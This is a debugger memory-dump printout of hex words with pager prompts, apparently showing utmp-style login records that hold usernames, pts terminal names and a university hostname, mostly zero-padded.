0x338f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33900:        0x00000000      0x504d3130      0x00000000      0x00000000
0x33910:        0x00000000      0x00000000      0x00000000      0x00000000
0x33920:        0x00000000      0x00000000      0x00000187      0x00060000
0x33930:        0x00000101      0x5144b175      0x00000000      0x00000000
0x33940:        0x00000000      0x00000000      0x00000000      0x00000000
0x33950:        0x00000000      0x00000000      0x00000000      0x00000000
0x33960:        0x00000000      0x00000000      0x00000000      0x00000000
0x33970:        0x00000000      0x00000000      0x00000000      0x00000000
0x33980:        0x00000000      0x00000000      0x00000000      0x00000000
0x33990:        0x00000000      0x00000000      0x00000000      0x00000000
0x339a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a00:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33a10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a20:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a30:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a40:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a50:        0x00000000      0x000000a4      0x62617a7a      0x00000000
0x33a60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a70:        0x00000000      0x00000000      0x74732f31      0x7074732f
0x33a80:        0x31000000      0x00000000      0x00000000      0x00000000
0x33a90:        0x00000000      0x00000000      0x00000000      0x0000023a
0x33aa0:        0x00070000      0x00000000      0x54554c5e      0x0006b034
0x33ab0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ac0:        0x00000000      0x00000000      0x000f766d      0x37322e63
0x33ad0:        0x732e756d      0x622e6564      0x75000000      0x00000000
0x33ae0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33af0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b00:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b20:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b30:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b40:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b50:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b70:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33b80:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b90:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ba0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33bb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33bc0:        0x00000000      0x00000000      0x00000018      0x62617a7a
0x33bd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33be0:        0x00000000      0x00000000      0x00000000      0x74732f32
0x33bf0:        0x7074732f      0x32000000      0x00000000      0x00000000
0x33c00:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c10:        0x000003db      0x00070000      0x00000000      0x54556b71
0x33c20:        0x00007555      0x00000000      0x00000000      0x00000000
0x33c30:        0x00000000      0x00000000      0x00000000      0x000f766d
0x33c40:        0x37322e63      0x732e756d      0x622e6564      0x75000000
0x33c50:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c70:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c80:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c90:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ca0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33cb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33cc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33cd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ce0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33cf0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d00:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d20:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d30:        0x00000000      0x00000000      0x00000000      0x00000018
0x33d40:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x33d50:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d60:        0x74732f33      0x7074732f      0x33000000      0x00000000
0x33d70:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d80:        0x00000000      0x0000041a      0x00070000      0x00000000
0x33d90:        0x54556dfb      0x000a22b2      0x00000000      0x00000000
0x33da0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33db0:        0x000f766d      0x37322e63      0x732e756d      0x622e6564
0x33dc0:        0x75000000      0x00000000      0x00000000      0x00000000
0x33dd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33de0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33df0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e00:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e20:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e30:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e40:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e50:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33e60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e70:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e80:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e90:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ea0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33eb0:        0x000000d8      0x62617a7a      0x00000000      0x00000000
0x33ec0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ed0:        0x00000000      0x74732f34      0x7074732f      0x34000000
0x33ee0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ef0:        0x00000000      0x00000000      0x0000046f      0x00070000
0x33f00:        0x00000000      0x54557127      0x000b5fd5      0x00000000
0x33f10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f20:        0x00000000      0x000f766d      0x37322e63      0x732e756d
0x33f30:        0x622e6564      0x75000000      0x00000000      0x00000000
0x33f40:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f50:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f70:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f80:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f90:        0x00000000      0x00000000      0x00000000      0x00000000
0x33fa0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33fb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33fc0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33fd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33fe0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ff0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34000:        0x00000000      0x00000000      0x00000000      0x00000000
0x34010:        0x00000000      0x00000000      0x00000000      0x00000000
0x34020:        0x00000000      0x000000d8      0x62617a7a      0x00000000
0x34030:        0x00000000      0x00000000      0x00000000      0x00000000
0x34040:        0x00000000      0x00000000      0x74732f35      0x7074732f
0x34050:        0x35000000      0x00000000      0x00000000      0x00000000
0x34060:        0x00000000      0x00000000      0x00000000      0x00007467
0x34070:        0x00080000      0x00000000      0x544b6439      0x0001fa71
0x34080:        0x00000000      0x00000000      0x00000000      0x00000000
0x34090:        0x00000000      0x00000000      0x00000000      0x00000000
0x340a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34100:        0x00000000      0x00000000      0x00000000      0x00000000
0x34110:        0x00000000      0x00000000      0x00000000      0x00000000
0x34120:        0x00000000      0x00000000      0x00000000      0x00000000
0x34130:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34140:        0x00000000      0x00000000      0x00000000      0x00000000
0x34150:        0x00000000      0x00000000      0x00000000      0x00000000
0x34160:        0x00000000      0x00000000      0x00000000      0x00000000
0x34170:        0x00000000      0x00000000      0x00000000      0x00000000
0x34180:        0x00000000      0x00000000      0x00000000      0x00000000
0x34190:        0x00000000      0x00000000      0x0000002f      0x62617a7a
0x341a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x341b0:        0x00000000      0x00000000      0x00000000      0x74732f36
0x341c0:        0x7074732f      0x36000000      0x00000000      0x00000000
0x341d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x341e0:        0x00007497      0x00080000      0x00000000      0x544b6438
0x341f0:        0x000e757d      0x00000000      0x00000000      0x00000000
0x34200:        0x00000000      0x00000000      0x00000000      0x00000000
0x34210:        0x00000000      0x00000000      0x00000000      0x00000000
0x34220:        0x00000000      0x00000000      0x00000000      0x00000000
0x34230:        0x00000000      0x00000000      0x00000000      0x00000000
0x34240:        0x00000000      0x00000000      0x00000000      0x00000000
0x34250:        0x00000000      0x00000000      0x00000000      0x00000000
0x34260:        0x00000000      0x00000000      0x00000000      0x00000000
0x34270:        0x00000000      0x00000000      0x00000000      0x00000000
0x34280:        0x00000000      0x00000000      0x00000000      0x00000000
0x34290:        0x00000000      0x00000000      0x00000000      0x00000000
0x342a0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x342b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34300:        0x00000000      0x00000000      0x00000000      0x0000002f
0x34310:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x34320:        0x00000000      0x00000000      0x00000000      0x00000000
0x34330:        0x74732f37      0x7074732f      0x37000000      0x00000000
0x34340:        0x00000000      0x00000000      0x00000000      0x00000000
0x34350:        0x00000000      0x000074a9      0x00080000      0x00000000
0x34360:        0x544b6438      0x000ba288      0x00000000      0x00000000
0x34370:        0x00000000      0x00000000      0x00000000      0x00000000
0x34380:        0x00000000      0x00000000      0x00000000      0x00000000
0x34390:        0x00000000      0x00000000      0x00000000      0x00000000
0x343a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34400:        0x00000000      0x00000000      0x00000000      0x00000000
0x34410:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34420:        0x00000000      0x00000000      0x00000000      0x00000000
0x34430:        0x00000000      0x00000000      0x00000000      0x00000000
0x34440:        0x00000000      0x00000000      0x00000000      0x00000000
0x34450:        0x00000000      0x00000000      0x00000000      0x00000000
0x34460:        0x00000000      0x00000000      0x00000000      0x00000000
0x34470:        0x00000000      0x00000000      0x00000000      0x00000000
0x34480:        0x0000002f      0x62617a7a      0x00000000      0x00000000
0x34490:        0x00000000      0x00000000      0x00000000      0x00000000
0x344a0:        0x00000000      0x74732f38      0x7074732f      0x38000000
0x344b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x344c0:        0x00000000      0x00000000      0x000074d9      0x00080000
0x344d0:        0x00000000      0x544b6438      0x0008c36e      0x00000000
0x344e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x344f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34500:        0x00000000      0x00000000      0x00000000      0x00000000
0x34510:        0x00000000      0x00000000      0x00000000      0x00000000
0x34520:        0x00000000      0x00000000      0x00000000      0x00000000
0x34530:        0x00000000      0x00000000      0x00000000      0x00000000
0x34540:        0x00000000      0x00000000      0x00000000      0x00000000
0x34550:        0x00000000      0x00000000      0x00000000      0x00000000
0x34560:        0x00000000      0x00000000      0x00000000      0x00000000
0x34570:        0x00000000      0x00000000      0x00000000      0x00000000
0x34580:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34590:        0x00000000      0x00000000      0x00000000      0x00000000
0x345a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345f0:        0x00000000      0x0000002f      0x62617a7a      0x00000000
0x34600:        0x00000000      0x00000000      0x00000000      0x00000000
0x34610:        0x00000000      0x00000000      0x74732f39      0x7074732f
0x34620:        0x39000000      0x00000000      0x00000000      0x00000000
0x34630:        0x00000000      0x00000000      0x00000000      0x000074f3
0x34640:        0x00080000      0x00000000      0x544b6438      0x0002c7ad
0x34650:        0x00000000      0x00000000      0x00000000      0x00000000
0x34660:        0x00000000      0x00000000      0x00000000      0x00000000
0x34670:        0x00000000      0x00000000      0x00000000      0x00000000
0x34680:        0x00000000      0x00000000      0x00000000      0x00000000
0x34690:        0x00000000      0x00000000      0x00000000      0x00000000
0x346a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346f0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34700:        0x00000000      0x00000000      0x00000000      0x00000000
0x34710:        0x00000000      0x00000000      0x00000000      0x00000000
0x34720:        0x00000000      0x00000000      0x00000000      0x00000000
0x34730:        0x00000000      0x00000000      0x00000000      0x00000000
0x34740:        0x00000000      0x00000000      0x00000000      0x00000000
0x34750:        0x00000000      0x00000000      0x00000000      0x00000000
0x34760:        0x00000000      0x00000000      0x0000002f      0x62617a7a
0x34770:        0x00000000      0x00000000      0x00000000      0x00000000
0x34780:        0x00000000      0x00000000      0x00000000      0x732f3130
0x34790:        0x7074732f      0x31300000      0x00000000      0x00000000
0x347a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x347b0:        0x00007501      0x00080000      0x00000000      0x544b6437
0x347c0:        0x000cbf95      0x00000000      0x00000000      0x00000000
0x347d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x347e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x347f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34800:        0x00000000      0x00000000      0x00000000      0x00000000
0x34810:        0x00000000      0x00000000      0x00000000      0x00000000
0x34820:        0x00000000      0x00000000      0x00000000      0x00000000
0x34830:        0x00000000      0x00000000      0x00000000      0x00000000
0x34840:        0x00000000      0x00000000      0x00000000      0x00000000
0x34850:        0x00000000      0x00000000      0x00000000      0x00000000
0x34860:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34870:        0x00000000      0x00000000      0x00000000      0x00000000
0x34880:        0x00000000      0x00000000      0x00000000      0x00000000
0x34890:        0x00000000      0x00000000      0x00000000      0x00000000
0x348a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x348b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x348c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x348d0:        0x00000000      0x00000000      0x00000000      0x0000002f
0x348e0:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x348f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34900:        0x732f3131      0x7074732f      0x31310000      0x00000000
0x34910:        0x00000000      0x00000000      0x00000000      0x00000000
0x34920:        0x00000000      0x00007527      0x00080000      0x00000000
0x34930:        0x544b6431      0x000def0a      0x00000000      0x00000000
0x34940:        0x00000000      0x00000000      0x00000000      0x00000000
0x34950:        0x00000000      0x00000000      0x00000000      0x00000000
0x34960:        0x00000000      0x00000000      0x00000000      0x00000000
0x34970:        0x00000000      0x00000000      0x00000000      0x00000000
0x34980:        0x00000000      0x00000000      0x00000000      0x00000000
0x34990:        0x00000000      0x00000000      0x00000000      0x00000000
0x349a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349d0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x349e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a50:        0x00000000      0x6a6b7269      0x63680000      0x00000000
0x34a60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a70:        0x00000000      0x732f3132      0x7074732f      0x31320000
0x34a80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a90:        0x00000000      0x00000000      0x0000083d      0x00080000
0x34aa0:        0x00000000      0x527021bc      0x0001e605      0x00000000
0x34ab0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ac0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ad0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ae0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34af0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b40:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34b50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ba0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34bb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34bc0:        0x00000000      0x00000000      0x64656d69      0x6a61636b
0x34bd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34be0:        0x00000000      0x00000000      0x732f3133      0x7074732f
0x34bf0:        0x31330000      0x00000000      0x00000000      0x00000000
0x34c00:        0x00000000      0x00000000      0x00000000      0x000006b2
0x34c10:        0x00080000      0x00000000      0x52701251      0x00074603
0x34c20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ca0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cb0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34cc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ce0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cf0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d30:        0x00000000      0x00000000      0x00000000      0x61676172
0x34d40:        0x61790000      0x00000000      0x00000000      0x00000000
0x34d50:        0x00000000      0x00000000      0x00000000      0x732f3134
0x34d60:        0x7074732f      0x31340000      0x00000000      0x00000000
0x34d70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d80:        0x00001603      0x00080000      0x00000000      0x52524378
0x34d90:        0x00032ffd      0x00000000      0x00000000      0x00000000
0x34da0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34db0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34dc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34dd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34de0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34df0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e20:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34e30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ea0:        0x00000000      0x00000000      0x00000000      0x0000002f
0x34eb0:        0x6b657662      0x30303031      0x00000000      0x00000000
0x34ec0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ed0:        0x732f3135      0x7074732f      0x31350000      0x00000000
0x34ee0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ef0:        0x00000000      0x0000156f      0x00080000      0x00000000
0x34f00:        0x525241c4      0x00052c9f      0x00000000      0x00000000
0x34f10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f90:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34fa0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fe0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ff0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35000:        0x00000000      0x00000000      0x00000000      0x00000000
0x35010:        0x00000000      0x00000000      0x00000000      0x00000000
0x35020:        0x00000000      0x64687572      0x6c627574      0x00000000
0x35030:        0x00000918      0x00000000      0x00000000      0x00000000
0x35040:        0x00000000      0x00000000      0x00000000      0x00000000
0x35050:        0x00000000      0x00000000      0x00000000      0x00000000
0x35060:        0x00000000      0x00000000      0x00000000      0x00000000
0x35070:        0x00000000      0x00000000      0x00000000      0x00000000
0x35080:        0x00000000      0x00000000      0x00000000      0x00000000
0x35090:        0x00000000      0x00000000      0x00000000      0x00000000
0x350a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35100:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35110:        0x00000000      0x00000000      0x00000000      0x00000000
0x35120:        0x00000000      0x00000000      0x00000000      0x00000000
0x35130:        0x00000000      0x00000000      0x00000000      0x00000000
0x35140:        0x00000000      0x00000000      0x00000000      0x00000000
0x35150:        0x00000000      0x00000000      0x00000000      0x00000000
0x35160:        0x00000000      0x00000000      0x00000000      0x00000000
0x35170:        0x00000000      0x00000000      0x00000000      0x00000000
0x35180:        0x00000000      0x00000000      0x00000000      0x00000000
0x35190:        0x00000000      0x00000000      0x00000000      0x00000000
0x351a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35200:        0x00000000      0x00000000      0x00000000      0x00000000
0x35210:        0x00000000      0x00000000      0x00000000      0x00000000
0x35220:        0x00000000      0x00000000      0x00000000      0x00000000
0x35230:        0x00000000      0x00000000      0x00000000      0x00000000
0x35240:        0x00000000      0x00000000      0x00000000      0x00000000
0x35250:        0x00000000      0x00000000      0x00000000      0x00000000
0x35260:        0x00000000      0x00000000      0x00000000      0x00000000
0x35270:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35280:        0x00000000      0x00000000      0x00000000      0x00000000
0x35290:        0x00000000      0x00000000      0x00000000      0x00000000
0x352a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35300:        0x00000000      0x00000000      0x00000000      0x00000000
0x35310:        0x00000000      0x00000000      0x00000000      0x00000000
0x35320:        0x00000000      0x00000000      0x00000000      0x00000000
0x35330:        0x00000000      0x00000000      0x00000000      0x00000000
0x35340:        0x00000000      0x00000000      0x00000000      0x00000000
0x35350:        0x00000000      0x00000000      0x00000000      0x00000000
0x35360:        0x00000000      0x00000000      0x00000000      0x00000000
0x35370:        0x00000000      0x00000000      0x00000000      0x00000000
0x35380:        0x00000000      0x00000000      0x00000000      0x00000000
0x35390:        0x00000000      0x00000000      0x00000000      0x00000000
0x353a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353e0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x353f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35400:        0x00000000      0x00000000      0x00000000      0x00000000
0x35410:        0x00000000      0x00000000      0x00000000      0x00000000
0x35420:        0x00000000      0x00000000      0x00000000      0x00000000
0x35430:        0x00000000      0x00000000      0x00000000      0x00000000
0x35440:        0x00000000      0x00000000      0x00000000      0x00000000
0x35450:        0x00000000      0x00000000      0x00000000      0x00000000
0x35460:        0x00000000      0x00000000      0x00000000      0x00000000
0x35470:        0x00000000      0x00000000      0x00000000      0x00000000
0x35480:        0x00000000      0x00000000      0x00000000      0x00000000
0x35490:        0x00000000      0x00000000      0x00000000      0x00000000
0x354a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35500:        0x00000000      0x00000000      0x00000000      0x00000000
0x35510:        0x00000000      0x00000000      0x00000000      0x00000000
0x35520:        0x00000000      0x00000000      0x00000000      0x00000000
0x35530:        0x00000000      0x00000000      0x00000000      0x00000000
0x35540:        0x00000000      0x00000000      0x00000000      0x00000000
0x35550:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35560:        0x00000000      0x00000000      0x00000000      0x00000000
0x35570:        0x00000000      0x00000000      0x00000000      0x00000000
0x35580:        0x00000000      0x00000000      0x00000000      0x00000000
0x35590:        0x00000000      0x00000000      0x00000000      0x00000000
0x355a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35600:        0x00000000      0x00000000      0x00000000      0x00000000
0x35610:        0x00000000      0x00000000      0x00000000      0x00000000
0x35620:        0x00000000      0x00000000      0x00000000      0x00000000
0x35630:        0x00000000      0x00000000      0x00000000      0x00000000
0x35640:        0x00000000      0x00000000      0x00000000      0x00000000
